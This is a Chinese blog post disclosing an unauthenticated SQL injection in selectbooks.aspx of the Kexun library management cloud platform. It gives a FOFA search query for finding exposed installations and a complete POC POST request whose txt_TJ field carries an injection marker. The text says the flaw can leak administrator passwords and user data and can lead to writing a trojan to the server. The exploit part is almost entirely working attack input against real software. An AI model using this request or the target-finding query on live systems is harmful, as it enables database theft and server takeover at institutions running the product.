科讯图书馆综合管理云平台selectbooks.aspx存在SQL注入漏洞

漏洞描述

科讯图书馆综合管理云平台selectbooks.aspx存在SQL注入,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

复现环境

FOFA

title=="	欢迎使用 图书馆云平台"

资产详情

漏洞复现

POC

POST /selectbooks.aspx HTTP/1.1
Host: 127.0.0.1
Content-Length: 6069
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/selectbooks.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2MzU3Njc5ODMPZBYCAgMPZBYKZg8QDxYGHg1EYXRhVGV4dEZpZWxkBQRuYW1lHg5EYXRhVmFsdWVGaWVsZAUCaWQeC18hRGF0YUJvdW5kZ2QQFQwe5bm%2F5b635biC5a6e6aqM5bCP5a2m6KW%2F5qCh5Yy6HuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuWMl%2BagoeWMuhvlub%2FlvrfluILnp5HliJvlrp7pqozlrabmoKEe5bm%2F5b635biC5ruo5rKz5a2m5qCh5Lit5a2m6YOoHuW5v%2BW%2Bt%2BW4gua7qOays%2BWtpuagoeWwj%2BWtpumDqB7lub%2FlvrfluILlrp7pqozlsI%2FlrabljZfmoKHljLoq5bm%2F5b635biC5qGD5bee5Lit5a2m5pWZ6IKy6ZuG5Zui5Y2X5qCh5Yy6FeW5v%2BW%2Bt%2BW4guS4nOS6reS4reWtph7lub%2FlvrfluILmoYPlt57kuIDlsI%2FkuJzmoKHljLob5bm%2F5b635biC6YKx5p2R5Lit5b%2BD5bCP5a2mHuW5v%2BW%2Bt%2BW4guahg%2BW3nuWbm%2BWwj%2BWNl%2BagoeWMugbmiYDmnIkVDAEzAjEzAjE1ATQBNQE2ATcBOQIxMAIxMQIxMgEwFCsDDGdnZ2dnZ2dnZ2dnZxYBZmQCAQ8QDxYGHwAFDOmmhuiXj%2BS9jee9rh8BBQzppobol4%2FkvY3nva4fAmdkEBUBBuaJgOaciRUBBuaJgOaciRQrAwFnZGQCBg8WAh4LXyFJdGVtQ291bnQCFBYoZg9kFgJmDxUKEuajruael%2BmHjOeahOa4uOaIjxE5NzgtNy0wMi0wMTQ3MjUtMBwo55Ge5YW4KeiQqOaLicK36LCi5biV5b636JGXFeS6uuawkeaWh%2BWtpuWHuueJiOekvgNHODkHNDAuMDAwMAZHODkvMzYe5bm%2F5b635biC5a6e6aqM5bCP5a2m6KW%2F5qCh5Yy6BjAwOTAzMwQ3MTE2ZAIBD2QWAmYPFQoS5qOu5p6X6YeM55qE5ri45oiPETk3OC03LTAyLTAxNDcyNS0wHCjnkZ7lhbgp6JCo5ouJwrfosKLluJXlvrfokZcV5Lq65rCR5paH5a2m5Ye654mI56S%2BA0c4OQc0MC4wMDAwBkc4OS8zNh7lub%2FlvrfluILlrp7pqozlsI%2Flrabopb%2FmoKHljLoGMDA5MDMyBDcxMTdkAgIPZBYCZg8VCg%2FlvIDlrabnrKzkuIDor74ROTc4LTctMDItMDEzOTgyLTgP6K645paH5bm%2F5Li757yWFeS6uuawkeaWh%2BWtpuWHuueJiOekvgNHNDAHMzcuNTAwMAdHNDAvMzoxHuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuilv%2BagoeWMugYwMDgwNTIEODA5NGQCAw9kFgJmDxUKD%2BW8gOWtpuesrOS4gOivvhE5NzgtNy0wMi0wMTM5ODItOA%2Forrjmloflub%2FkuLvnvJYV5Lq65rCR5paH5a2m5Ye654mI56S%2BA0c0MAczNy41MDAwB0c0MC8zOjEe5bm%2F5b635biC5a6e6aqM5bCP5a2m6KW%2F5qCh5Yy6BjAwODA1MQQ4MDk1ZAIED2QWAmYPFQoP5byA5a2m56ys5LiA6K%2B%2BETk3OC03LTAyLTAxMzk4Mi04D%2BiuuOaWh%2BW5v%2BS4u%2Be8lhXkurrmsJHmloflrablh7rniYjnpL4DRzQwBzM3LjUwMDAHRzQwLzM6MR7lub%2FlvrfluILlrp7pqozlsI%2Flrabopb%2FmoKHljLoGMDA4MDUwBDgwOTZkAgUPZBYCZg8VCg%2FlvIDlrabnrKzkuIDor74ROTc4LTctMDItMDEzOTgyLTgP6K645paH5bm%2F5Li757yWFeS6uuawkeaWh%2BWtpuWHuueJiOekvgNHNDAHMzcuNTAwMAdHNDAvMzoyHuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuilv%2BagoeWMugYwMDgwNDkEODA5N2QCBg9kFgJmDxUKD%2BW8gOWtpuesrOS4gOivvhE5NzgtNy0wMi0wMTM5ODItOA%2Forrjmloflub%2FkuLvnvJYV5Lq65rCR5paH5a2m5Ye654mI56S%2BA0c0MAczNy41MDAwB0c0MC8zOjIe5bm%2F5b635biC5a6e6aqM5bCP5a2m6KW%2F5qCh5Yy6BjAwODA0OAQ4MDk4ZAIHD2QWAmYPFQoP5byA5a2m56ys5LiA6K%2B%2BETk3OC03LTAyLTAxMzk4Mi04D%2BiuuOaWh%2BW5v%2BS4u%2Be8lhXkurrmsJHmloflrablh7rniYjnpL4DRzQwBzM3LjUwMDAHRzQwLzM6Mh7lub%2FlvrfluILlrp7pqozlsI%2Flrabopb%2FmoKHljLoGMDA4MDQ3BDgwOTlkAggPZBYCZg8VCgznjI7kurrnrJTorrAROTc4LTctMDItMDEzNzM4LTEUKOS%2FhCnlsaDmoLzmtoXlpKvokZcV5Lq65rCR5paH5a2m5Ye654mI56S%2BBEk1MTIHMjkuMDAwMAdJNTEyLzM2HuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuilv%2BagoeWMugYwMDY1NzMEOTU2N2QCCQ9kFgJmDxUKDOeMjuS6uueslOiusBE5NzgtNy0wMi0wMTM3MzgtMRQo5L%2BEKeWxoOagvOa2heWkq%2BiRlxXkurrmsJHmloflrablh7rniYjnpL4ESTUxMgcyOS4wMDAwB0k1MTIvMzYe5bm%2F5b635biC5a6e6aqM5bCP5a2m6KW%2F5qCh5Yy6BjAwNjU3MgQ5NTY4ZAIKD2QWAmYPFQoM54yO5Lq656yU6K6wETk3OC03LTAyLTAxMzczOC0xFCjkv4Qp5bGg5qC85raF5aSr6JGXFeS6uuawkeaWh%2BWtpuWHuueJiOekvgRJNTEyBzI5LjAwMDAHSTUxMi8zNh7lub%2FlvrfluILlrp7pqozlsI%2Flrabopb%2FmoKHljLoGMDA2NTcxBDk1NjlkAgsPZBYCZg8VChPovrnln44g5rmY6KGM5pWj6K6wETk3OC03LTAyLTAxMzc3NC05DOayiOS7juaWh%2BiRlxXkurrmsJHmloflrablh7rniYjnpL4ESTI0NgcyOC4wMDAwB0kyNDYvMTce5bm%2F5b635biC5a6e6aqM5bCP5a2m6KW%2F5qCh5Yy6BjAwNjU2NwQ5NTczZAIMD2QWAmYPFQoT6L655Z%2BOIOa5mOihjOaVo%2BiusBE5NzgtNy0wMi0wMTM3NzQtOQzmsojku47mlofokZcV5Lq65rCR5paH5a2m5Ye654mI56S%2BBEkyNDYHMjguMDAwMAdJMjQ2LzE3HuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuilv%2BagoeWMugYwMDY1NjYEOTU3NGQCDQ9kFgJmDxUKE%2Bi%2BueWfjiDmuZjooYzmlaPorrAROTc4LTctMDItMDEzNzc0LTkM5rKI5LuO5paH6JGXFeS6uuawkeaWh%2BWtpuWHuueJiOekvgRJMjQ2BzI4LjAwMDAHSTI0Ni8xNx7lub%2FlvrfluILlrp7pqozlsI%2Flrabopb%2FmoKHljLoGMDA2NTY1BDk1NzVkAg4PZBYCZg8VCgnlsI%2FnjovlrZAROTc4LTctMDItMDE0NTU3LTc1KOazlSnlnKPln4PlhYvnta7kvanph4woQW50b2luZSBkZSBTYWludC1FeHVww6lyeSnokZcV5Lq65rCR5paH5a2m5Ye654mI56S%2BBEk1NjUHNDguMDAwMAdJNTY1LzQ5HuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuilv%2BagoeWMugYwMDM4NzYFMTIyNThkAg8PZBYCZg8VCgnlsI%2FnjovlrZAROTc4LTctMDItMDE0NTU3LTc1KOazlSnlnKPln4PlhYvnta7kvanph4woQW50b2luZSBkZSBTYWludC1FeHVww6lyeSnokZcV5Lq65rCR5paH5a2m5Ye654mI56S%2BBEk1NjUHNDguMDAwMAdJNTY1LzQ5HuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuilv%2BagoeWMugYwMDM4NzUFMTIyNTlkAhAPZBYCZg8VCgnlsI%2FnjovlrZAROTc4LTctMDItMDE0NTU3LTc1KOazlSnlnKPln4PlhYvnta7kvanph4woQW50b2luZSBkZSBTYWludC1FeHVww6lyeSnokZcV5Lq65rCR5paH5a2m5Ye654mI56S%2BBEk1NjUHNDguMDAwMAdJNTY1LzQ5HuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuilv%2BagoeWMugYwMDM4NzQFMTIyNjBkAhEPZBYCZg8VCgjnroDCt%2BeIsRE5NzgtNy0wMi0wMTM3MjAtNhwo6IuxKeWkj%2Ba0m%2BiSgsK35YuD5pyX54m56JGXFeS6uuawkeaWh%2BWtpuWHuueJiOekvgRJNTYxBzQ1LjAwMDAHSTU2MS80Nx7lub%2FlvrfluILlrp7pqozlsI%2Flrabopb%2FmoKHljLoGMDAzNzIwBTEyNDE0ZAISD2QWAmYPFQoI566AwrfniLEROTc4LTctMDItMDEzNzIwLTYcKOiLsSnlpI%2FmtJvokoLCt%2BWLg%2Bacl%2BeJueiRlxXkurrmsJHmloflrablh7rniYjnpL4ESTU2MQc0NS4wMDAwB0k1NjEvNDce5bm%2F5b635biC5a6e6aqM5bCP5a2m6KW%2F5qCh5Yy6BjAwMzcxOQUxMjQxNWQCEw9kFgJmDxUKCOeugMK354ixETk3OC03LTAyLTAxMzcyMC02HCjoi7Ep5aSP5rSb6JKCwrfli4PmnJfnibnokZcV5Lq65rCR5paH5a2m5Ye654mI56S%2BBEk1NjEHNDUuMDAwMAdJNTYxLzQ3HuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuilv%2BagoeWMugYwMDM3MTgFMTI0MTZkAgwPDxYCHgRUZXh0BQM1MTZkZAINDw8WAh8EBQUxMDMxM2RkZACQ8JDBn1ai48ALQHhH669cSBkOYcTrKpiV%2B%2F1aZ16C&__VIEWSTATEGENERATOR=D304C484&__EVENTVALIDATION=%2FwEdABfSQ9wqLAjVbFJQA431hgLGsdFSvGsZawyu6mJ6VOz4BI8rADU8sXOhSLaviOV4heGilhohAWBIH47hveLPz2QPOLiH5BfXwJz%2ByVnBwuOK7AwuPS2UTk4279fGovw%2FgCh44cW%2F5NaOpiC%2FiXwjETHVpiTmOPljEzLBH4uwA7HVmZIDcOlsGdTFEqpu1QEQvmH6aevTmZ79Zm6V6cAUcycwNjWRX3uPAR9sIvvHdxNijlVPG5NNWrm5ssqiOBfsDPzkp9zkEY3WOfxK4NLTe%2FiOswdsiIiymO1WE%2FYkGOt4ABdSB8I4F8xP93jrQQG3%2FtfmSwHrb0Z9Yj1fmyd7BopmieJgJfPaOO4tPfGglCQbdZlykKxse%2FY1k8PBPoLi%2FYRYkyZxCG07DnSGbtWANXTK4SqpLxzBmGeF9DLtbxZNnDhOwJBfJwLozHC02yp2MAvyJ9DfARXcGJL9%2By%2BZHLJDTssYVuALS7OrnWH4GWFVPMazarn7Pc6eNlPES%2BVfxyB42kYym9ygQ8qkVPSmPGQU&Years=2024&ddl_address=3&dll_Collection=%E6%89%80%E6%9C%89&seleTJ=1&txt_TJ=1*&btn_sel=

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值